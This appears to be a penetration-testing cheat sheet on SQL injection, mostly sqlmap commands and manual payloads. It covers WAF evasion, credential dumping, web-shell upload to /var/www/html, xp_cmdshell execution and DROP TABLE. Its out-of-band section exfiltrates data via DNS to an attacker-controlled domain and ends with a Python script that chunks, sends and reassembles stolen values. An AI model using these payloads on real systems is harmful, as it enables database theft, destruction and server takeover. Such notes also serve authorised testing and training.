SQL Injection


Source: Docs > 2 - Pre-Engagement > checklist#sql

SQL

If these steps fail, the target is probably not exploitable through automation; switch to the manual techniques below.

Phase 1: Injection & Tuning

  • Manual Triage (Burp): Confirm the “True” vs “False” response difference (size or content) by hand first. Never point SQLMap at an injection you have not confirmed yourself.
  • The Setup: Save the raw request to req.txt and mark the injection point with *. (sqlmap -r req.txt --batch)
  • The Unlocker (Tuning): OR-based logic or extra closing parentheses needed before the payload fires? (--level 5 --risk 3; risk 3 adds the OR-based tests, level 5 tests every boundary plus cookie and header values)
  • The Syntax Fix: SQLMap guessing the wrong boundaries? Force the ones you confirmed in Burp. (--prefix="')" --suffix="-- -")
  • The Speedup: Time-based checks taking forever? Restrict the techniques. (--technique=BEU forces Boolean, Error and Union only)

Phase 2: Stability & Evasion

  • The Hallucination Fix: Extracted data “2 letters off” or garbage? Pin the True marker or ignore dynamic markup. (--string="SuccessMsg" or --text-only; --no-cast from the troubleshooting list also helps)
  • The Bypass: WAF blocking or 403s? (--random-agent --tamper=space2comment --skip-waf; note that --skip-waf only skips WAF detection, the tamper script and user agent do the evading)

Phase 3: Loot & Shells

  • The Recon: Check privileges and context immediately. (--is-dba --current-user --current-db)
  • The Dump: Surgical extraction (don’t dump the world). (-D <DB> -T <TABLE> -C <USER,PASS> --dump)
  • The Endgame (RCE): DBA is True? (--os-shell; if it comes back empty retry with --technique=E, or drop a shell by hand with --file-write="shell.php" --file-dest="/var/www/html/shell.php", which needs a writable, web-reachable path and, on MySQL, a secure_file_priv that permits it)

Troubleshooting (Panic Modifiers)

Add these to The Dump command when the injection is confirmed but data fails to extract.

  • --union-cols=X: Manually set the UNION column count (accepts a range such as 5-8) if SQLMap counts wrong.
  • --no-cast: Disable casting of retrieved values to string (fixes specific DB errors and some garbled output).
  • --hex: Retrieve data hex-encoded (bypasses WAF filters on the output and avoids character-set problems).

SQLMap supports techniques BEUSTQ: Boolean blind (B), Error-based (E), Union (U), Stacked (S), Time-based blind (T), Inline (Q), plus Out-of-band (OOB) via DNS exfiltration. Use sqlmap -hh to list techniques.

Union Based SQLi

Direct data extraction by combining results from two queries.

Mechanics:

  1. Find Column Count: ORDER BY 1, ORDER BY 2… until the query errors; the last N that worked is the column count.
  2. Find Visible Columns: UNION SELECT 1, 2, 3, 4 (check which numbers appear on the page).
  3. Extract Data: Replace a visible number with database(), user(), or a column name.

-- Get column count: increase N in ORDER BY N until the query errors
' ORDER BY 2-- -
-- Alternative: a UNION with the wrong number of columns also errors, so iterate 1,2,3... here too
' UNION SELECT 1,2-- -

-- Get current user and database (4-column query; positions 2 and 3 are the visible ones)
' UNION SELECT 1, user(), database(), 4-- -
-- Same data from the mysql.user table (needs read access to it)
' UNION SELECT 1, user, database(), 4 FROM mysql.user-- -

-- Enumeration: list every table of the current database in one visible column
' UNION SELECT 1, group_concat(table_name), 3, 4 FROM information_schema.tables WHERE table_schema=database()-- -

Source: Docs > 9 - Notes > sqlmap#union-based

Union-based

Combine two queries so the injected SELECT is rendered in the response. Count the displayed columns first (and if SQLMap miscounts, hand it the column range with --union-cols).

sqlmap -u "<URL>" --technique=U --union-cols=5

Error Based SQLi

Force the database to dump data inside a verbose error message.

Mechanics: Use functions that fail and echo their argument back in the error message (MySQL extractvalue/updatexml XPath errors, MSSQL type conversion errors), so the value you want is returned inside the error text. Only works when the application shows verbose database errors.

-- MySQL (extractvalue XPath error echoes the string; output is capped at 32 characters, so page longer values with substring())
' AND extractvalue(1, concat(0x7e, (SELECT @@version), 0x7e))-- -

-- MSSQL (conversion error: comparing a string to an int fails and the message prints the string)
' AND 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Source: Docs > 9 - Notes > sqlmap#error-based

Error-based

Trigger DB errors that leak data inside the error message.

sqlmap -u "<URL>" --technique=E

Blind SQLi (Boolean)

Infer data by asking True/False questions. Content changes based on the answer.

Mechanics: If ' AND 1=1 (True) loads the page normally and ' AND 1=2 (False) hides content, the parameter is injectable and the visible difference is your oracle.

-- Verification
' AND 1=1-- -  (Page loads)
' AND 1=2-- -  (Content missing)

-- Data Extraction (Manual logic)
-- Is the first letter of user() 'a'? Each question leaks one yes/no answer; repeat per position
' AND (SELECT substring(user(),1,1))='a'-- -

Source: Docs > 9 - Notes > sqlmap#blind-boolean

Blind Boolean

Infer data from whether the page content or behaviour changes (true vs false).

NOTE: this technique is unstable when the page contains dynamic content; it may need several runs, --string/--not-string to pin the True marker, or --no-cast.

sqlmap -u "<URL>" --technique=B --level 5 --risk 3

Blind SQLi (Time)

Infer data by measuring response delay.

Mechanics: If the condition is True the database sleeps, so the response arrives the injected delay later (~5 s with the payloads below). Measure the normal response time first and repeat the check, so network jitter is not mistaken for a hit.

-- MySQL
' AND (SELECT SLEEP(5))-- -

-- MSSQL (stacked statement; needs stacked-query support)
'; WAITFOR DELAY '0:0:5'--

-- PostgreSQL (stacked statement)
'; SELECT pg_sleep(5)--

Source: Docs > 9 - Notes > sqlmap#blind-time

Blind Time

Infer data from response delays (e.g. SLEEP) when the condition is true.

sqlmap -u "<URL>" --technique=T

Stacked Queries SQLi

Append additional SQL statements after the vulnerable query (e.g. non-query statements or OS commands).

Mechanics: “Piggy-backing”: terminate the original statement with ; and append a second one (e.g. ; DROP TABLE users). Only works when both the database and the client driver accept multiple statements in one call (MSSQL and PostgreSQL typically do; MySQL usually does not unless the driver enables multi-statements, as PHP's mysqli_multi_query does). SQLMap can use stacked queries for data retrieval (time-based style) or for non-query and OS execution when the backend supports it. Note that xp_cmdshell is disabled by default on MSSQL and needs sysadmin rights to switch on via sp_configure.

-- Example: second statement runs after the first (destructive; never run this against a client target)
'; DROP TABLE users-- -
-- MSSQL OS command through a stacked query (xp_cmdshell must be enabled)
'; EXEC xp_cmdshell 'whoami'-- -

Source: Docs > 9 - Notes > sqlmap#stacked-queries

Stacked queries

Append extra SQL statements after the vulnerable one (e.g. INSERT/UPDATE/DELETE or OS commands); requires DB support (e.g. MSSQL, PostgreSQL).

sqlmap -u "<URL>" --technique=S

Inline Queries SQLi

Embed a subquery inside the original query so the result is used in place.

Mechanics: The injected value lands where the application already embeds a subquery, e.g. SELECT (SELECT @@version) FROM ..., so your subquery runs in place and its result is consumed by the outer query. Less common than the other types because the application's query structure has to match. SQLMap tests for it with --technique=Q when the injection point allows embedded queries.

-- Example: version in a subquery
SELECT (SELECT @@version) FROM ...

Source: Docs > 9 - Notes > sqlmap#inline-queries

Inline queries

Query embedded inside the original query; uncommon and app-dependent.

sqlmap -u "<URL>" --technique=Q

Out-of-Band (OOB) SQLi

Exfiltrate data via DNS/HTTP requests when nothing from the query is reflected in the response and a timing channel is not usable.

Mechanics: Force the DB to resolve a hostname under a domain you control (interactsh listener). The data is prepended as the subdomain, so it shows up in the query your listener logs.

# 1. Start Listener
interactsh-client

# 2. Payload Construction (example domain: domain.com)
# MSSQL (xp_dirtree; needs stacked queries). The UNC path makes the server resolve <data>.domain.com
'; DECLARE @data varchar(1024); SELECT @data = (SELECT user_name()); EXEC('master..xp_dirtree "\\'+@data+'.domain.com\a"');--

# MySQL on Windows (UNC path handed to LOAD_FILE; secure_file_priv must be empty). On Linux LOAD_FILE does not resolve UNC paths, so this channel is Windows-only.
# user() contains '@', which is not a legal hostname character; hex-encode the value when the resolver refuses the name.
' AND (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT user()), '.domain.com\\a')))-- -

Source: Docs > 9 - Notes > sqlmap#out-of-band

Out-of-band

Exfiltrate via DNS or HTTP to a server you control when no output is visible. With --dns-domain sqlmap acts as the DNS server for that domain: it must run as root (it binds UDP port 53) and the domain's NS record must point at the host running sqlmap.

sqlmap -u "<URL>" --dns-domain=<DOMAIN>
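The payloads above prepend the raw value as the subdomain. Real values contain characters that are not legal in a hostname ('@' in user@host, spaces, quotes) and a DNS label holds at most 63 bytes, so in practice the value is HEX()-encoded on the database side, leaked in fixed-size chunks, and reassembled from what the listener logs. The script below is an added example (not code from the page, sqlmap or interactsh) that does both halves; the domain, the secret and the log lines are constructed, and the listener line format is illustrative only.

```python
"""Added example (not code from the page, sqlmap or interactsh): DNS-safe encoding for
out-of-band exfiltration and reassembly of what the listener logs. The payload is the
MySQL-on-Windows LOAD_FILE UNC trick from the page; domain, secret and log are constructed.
"""
import re

CHUNK = 62          # hex characters per query: 31 bytes, under the 63-byte DNS label limit


def mysql_dns_payload(expr: str, domain: str, seq: int) -> str:
    """Leak chunk `seq` of HEX(expr) as <seq>.<hex>.<domain>. Past the end of the data
    SUBSTRING() returns '' and the name becomes invalid, so no query arrives: that is
    the stop signal for the sending loop."""
    start = seq * CHUNK + 1                                  # SUBSTRING is 1-based
    name = f"CONCAT('{seq}.', SUBSTRING(HEX({expr}),{start},{CHUNK}), '.{domain}\\\\a')"
    return rf"' AND (SELECT LOAD_FILE(CONCAT('\\\\', {name})))-- -"


def model_dns_names(value: str, domain: str):
    """Python model of the names the database side emits for `value` (checks the
    chunk arithmetic offline and feeds the fabricated log below)."""
    hexdata = value.encode().hex().upper()                   # MySQL HEX() is upper-case
    return [f"{seq}.{hexdata[seq * CHUNK:(seq + 1) * CHUNK]}.{domain}"
            for seq in range((len(hexdata) + CHUNK - 1) // CHUNK)]


def decode_dns_log(lines, domain: str) -> str:
    """Reassemble the value from logged queries. Resolvers retry (duplicate lines) and may
    randomise label case (0x20 encoding), so collapse by seq and parse hex case-insensitively.
    A gap in the sequence means a lost query; fail loudly rather than return a corrupt value."""
    pat = re.compile(r"(\d+)\.([0-9a-f]+)\." + re.escape(domain), re.IGNORECASE)
    chunks = {}
    for line in lines:
        m = pat.search(line)
        if m:
            chunks[int(m.group(1))] = m.group(2)
    missing = [i for i in range(max(chunks) + 1) if i not in chunks] if chunks else []
    if missing:
        raise ValueError(f"lost chunks {missing}: re-send those seq values")
    hexdata = "".join(chunks[i] for i in sorted(chunks))
    return bytes.fromhex(hexdata).decode("utf-8", errors="replace")


# --- constructed data for an offline run -----------------------------------------------

DOMAIN = "oob.example"
SECRET = "dbadmin@localhost:example-password-that-is-long-enough"   # spans two chunks
LOG = [f"[{name}] Received DNS interaction (A) from 198.51.100.7"
       for name in model_dns_names(SECRET, DOMAIN)]
LOG.append(LOG[0])                  # resolver retry: the same query seen twice
LOG.append(LOG[1].swapcase())       # 0x20 case randomisation on the wire
LOG.append("[ping.oob.example] Received HTTP interaction from 198.51.100.7")  # unrelated noise

if __name__ == "__main__":
    for seq in range(2):
        print(mysql_dns_payload("user()", DOMAIN, seq))
    print(decode_dns_log(LOG, DOMAIN))          # dbadmin@localhost:example-password-that-is-long-enough
```

Send mysql_dns_payload(expr, domain, seq) for seq = 0, 1, 2, ... until a round produces no query at the listener, then feed the listener's lines to decode_dns_log. One chunk per query keeps every name valid; packing several labels into one name is faster but produces an empty label (and no query at all) as soon as the data runs out mid-name.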